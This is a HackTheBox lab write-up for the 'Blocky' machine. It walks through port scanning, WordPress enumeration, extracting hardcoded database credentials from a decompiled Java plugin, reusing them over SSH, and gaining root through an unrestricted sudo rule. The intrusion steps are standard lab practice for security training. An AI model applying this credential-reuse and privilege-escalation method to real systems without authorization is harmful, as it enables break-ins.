Post

Blocky

Walkthrough of the Blocky machine – WordPress/Minecraft enumeration, credentials leaked from a decompiled Java plugin, and a sudo ALL misconfiguration for root.

Blocky

Blocky - HackTheBox Writeup

Blocky is an Easy Linux machine on HackTheBox. It centers on a WordPress site tied to a Minecraft server, where a leaked Java plugin JAR reveals database credentials that get reused for SSH, and a wide-open sudo misconfiguration hands over root immediately.

Box Info

  • Name: Blocky
  • Difficulty: Easy
  • OS: Linux
  • Release Date: 21 Jul 2017
  • Retire Date: 09 Dec 2017
  • Creator: Arrexel

Recon

nmap

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
┌──🦊 T4T4R1S  IP ➜  10.211.55.3   ~
└─👀 ➜ nmap -p- --min-rate 10000 -oA machines/nmap/Blocky 10.129.55.237
Starting Nmap 7.95 ( https://nmap.org ) at 2026-08-31 04:19 EEST
Nmap scan report for 10.129.55.237
Host is up (0.90s latency).
Not shown: 65531 filtered tcp ports (no-response)
PORT      STATE SERVICE
21/tcp    open  ftp
22/tcp    open  ssh
80/tcp    open  http
25565/tcp open  minecraft

Nmap done: 1 IP address (1 host up) scanned in 20.34 seconds

┌──🦊 T4T4R1S  IP ➜  10.211.55.3   ~
└─👀 ➜ nmap -sCV -p 21,22,80,25565 10.129.55.237
Starting Nmap 7.95 ( https://nmap.org ) at 2026-08-31 04:20 EEST
PORT      STATE SERVICE   VERSION
21/tcp    open  ftp?
22/tcp    open  ssh       OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 d6:2b:99:b4:d5:e7:53:ce:2b:fc:b5:d7:9d:79:fb:a2 (RSA)
|   256 5d:7f:38:95:70:c9:be:ac:67:a0:1e:86:e7:97:84:03 (ECDSA)
|_  256 09:d5:c2:04:95:1a:90:ef:87:56:25:97:df:83:70:67 (ED25519)
80/tcp    open  http      Apache httpd 2.4.18
|_http-title: Did not follow redirect to http://blocky.htb
|_http-server-header: Apache/2.4.18 (Ubuntu)
25565/tcp open  minecraft Minecraft 1.11.2 (Protocol: 127, Message: A Minecraft Server, Users: 0/20)
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel

┌──🦊 T4T4R1S  IP ➜  10.211.55.3   ~
└─👀 ➜ 

Findings

  • Port 21: FTP
  • Port 22: SSH (OpenSSH 7.2p2)
  • Port 80: Apache 2.4.18
  • Port 25565: Minecraft server (unusual — worth remembering, ties in later)

Enumerate FTP - TCP 21

Tried connecting to FTP, but got no usable response — the service didn’t accept an anonymous session or respond meaningfully, so I moved on to the web server:

1
2
3
4
5
6
┌──🦊 T4T4R1S  IP ➜  10.211.55.3   ~/Documents/htb_machines/blocky
└─👀 ➜ ftp 10.129.55.237
Connected to 10.129.55.237.

┌──🦊 T4T4R1S  IP ➜  10.211.55.3   ~/Documents/htb_machines/blocky
└─👀 ➜ nc 10.129.55.237 21 

Website - TCP 80

Added the hostname to /etc/hosts first:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
┌──🦊 T4T4R1S  IP ➜  10.211.55.3   ~/Documents/htb_machines/blocky
└─👀 ➜ echo "10.129.55.237 blocky.htb" | sudo tee -a /etc/hosts
10.129.55.237 blocky.htb

┌──🦊 T4T4R1S  IP ➜  10.211.55.3   ~/Documents/htb_machines/blocky
└─👀 ➜ cat /etc/hosts
127.0.0.1       localhost
127.0.1.1       kali-linux-2025-2.localdomain   kali-linux-2025-2

# The following lines are desirable for IPv6 capable hosts
::1     localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
127.0.1.1    T4T4R1S
10.129.55.237 blocky.htb

Browsing to blocky.htb showed a landing page powered by WordPress:

alt text

Directory Fuzzing

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
┌──🦊 T4T4R1S  IP ➜  10.211.55.3   ~/Documents/htb_machines/blocky
└─👀 ➜ gobuster dir -u http://10.129.55.237 -w /usr/share/wordlists/seclists/Dirp-list-2.3-medium.txt -x php -t 40 

/wiki (Status: 301)
/wp-content (Status: 301)
/wp-login.php (Status: 200)
/plugins (Status: 301)
/wp-includes (Status: 301)
/index.php (Status: 301)
/javascript (Status: 301)
/wp-trackback.php (Status: 200)
/wp-admin (Status: 301)
/phpmyadmin (Status: 301)
/wp-signup.php (Status: 302)
/server-status (Status: 403)

With WordPress directories confirmed, I ran wpscan to enumerate further:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
┌──🦊 T4T4R1S  IP ➜  10.211.55.3   ~/Documents/htb_machines/blocky
└─👀 ➜ wpscan --url http://10.129.55.237  -e ap,t,tt,u --ignore-main-redirect --wp-content-dir http://10.129.55.237/wp-content
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.28
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://10.129.55.237/ [10.129.55.237]
[+] Started: Wed Sep  2 03:02:18 2026

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] WordPress version 4.8 identified (Insecure, released on 2017-06-08).
 | Found By: Emoji Settings (Passive Detection)
 |  - http://blocky.htb/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=4.8'
 | Confirmed By: Meta Generator (Passive Detection)
 |  - http://blocky.htb/, Match: 'WordPress 4.8'

[i] The main theme could not be detected.

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Most Popular Themes (via Passive and Aggressive Methods)
 Checking Known Locations - Time: 00:00:22 <================================================> (400 / 400) 100.00% Time: 00:00:22

[i] No themes Found.

[+] Enumerating Timthumbs (via Passive and Aggressive Methods)
 Checking Known Locations - Time: 00:02:25 <==============================================> (2568 / 2568) 100.00% Time: 00:02:25

[i] No Timthumbs Found.

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:09 <==================================================> (10 / 10) 100.00% Time: 00:00:09

[i] User(s) Identified:

[+] notch
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Wed Sep  2 03:06:09 2026
[+] Requests Done: 3021
[+] Cached Requests: 8
[+] Data Sent: 703.646 KB
[+] Data Received: 1.409 MB
[+] Memory used: 286.461 MB
[+] Elapsed time: 00:03:50

Findings: WordPress user notch — no other useful data from wpscan.

Leaked Java Plugin

Under /plugins (found via gobuster), there were two downloadable .jar files:

alt text

I decompiled both with jd-gui. One class in particular — tied to the Minecraft server plugin — stood out with hardcoded credentials:

alt text

The class contained a SQL username and password. Trying root with that password against SSH failed, so I tried the same password against the WordPress user found earlier, notch.


Shell as notch

1
2
3
4
5
6
7
8
9
┌──🦊 T4T4R1S  IP ➜  10.211.55.3   ~
└─👀 ➜ ssh  notch@10.129.55.237 
The authenticity of host '10.129.55.237 (10.129.55.237)' can't be established.
ED25519 key fingerprint is SHA256:ZspC3hwRDEmd09Mn/ZlgKwCv8I8KDhl9Rt2Us0fZ0/8.
This host key is known by the following other names/addresses:
    ~/.ssh/known_hosts:2: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.129.55.237' (ED25519) to the list of known hosts.
notch@10.129.55.237's password: 

Logging in with notch and the password recovered from the decompiled JAR worked:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-62-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

7 packages can be updated.
7 updates are security updates.


Last login: Fri Jul  8 07:24:50 2022 from 10.10.14.29
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.


notch@Blocky:~$ whoami
notch

Shell obtained as notch — a clear case of credential reuse between the Minecraft/WordPress backend and the system account.


Privilege Escalation: notch → root

The simplest possible privesc on this box — checked sudo -l first:

1
2
3
4
5
6
7
8
notch@Blocky:~$ sudo -l
[sudo] password for notch: 
Matching Defaults entries for notch on Blocky:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User notch may run the following commands on Blocky:
    (ALL : ALL) ALL
notch@Blocky:~$ 

notch can run any command as any user with sudo. Escalating to root is immediate:

1
2
3
notch@Blocky:~$ sudo su -
root@Blocky:~# whoami
root

Root obtained — the simplest possible path on this box.


Lessons

  • Credential reuse is a recurring theme on easy boxes. Any credential found anywhere (config files, decompiled binaries, leaked JARs) should be tried against every other service and account on the host.
  • Decompiling application JARs/binaries found on a web server is a legitimate and often overlooked enumeration step — plugins tied to game servers, backend services, etc. can leak hardcoded secrets.
  • sudo -l should always be the first privesc check on any foothold; a wide-open (ALL : ALL) ALL entry is as easy as it gets.

Find me online:

• TryHackMe: t4t4r1s

• HackTheBox: t4t4r1s

• LinkedIn: Mustafa Eltayeb

• X: @mustafa_altayeb


This post is licensed under CC BY 4.0 by the author.